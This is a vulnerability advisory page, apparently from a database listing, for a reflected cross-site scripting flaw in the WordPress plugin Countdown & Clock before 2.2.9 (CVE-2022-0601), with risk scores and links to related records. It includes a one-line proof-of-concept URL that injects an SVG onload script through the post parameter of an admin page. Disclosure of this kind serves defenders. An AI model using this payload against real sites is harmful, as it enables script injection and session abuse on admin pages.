Lucene search
Ran CraneWPEX-ID:6EC62EAE-2072-4098-8F77-B22D61A89CBFHistoryFeb 21, 2022 - 12:00 a.m.
Countdown & Clock < 2.2.9 - Reflected Cross-Site Scripting
2022-02-2100:00:00
Ran Crane
81
countdown
clock
reflected
cross-site scripting
exploit
EPSS
0.001
Percentile
30.0%
The plugin does not sanitize and escape the post parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting.
https://example.com/wp-admin/post-new.php?post_type=ycdcountdown&post="><svg onload=alert(/XSS/)>Related
prion
prion
Cross site scripting
2022-03-14 15:15:00
nvd
nvd
CVE-2022-0601
2022-03-14 15:15:10
patchstack
patchstack
cve
cve
CVE-2022-0601
2022-03-14 15:15:10
wpvulndb
wpvulndb
Countdown & Clock < 2.2.9 - Reflected Cross-Site Scripting
2022-02-21 00:00:00
cvelist
cvelist
CVE-2022-0601 Countdown & Clock < 2.2.9 - Reflected Cross-Site Scripting
2022-03-14 14:41:38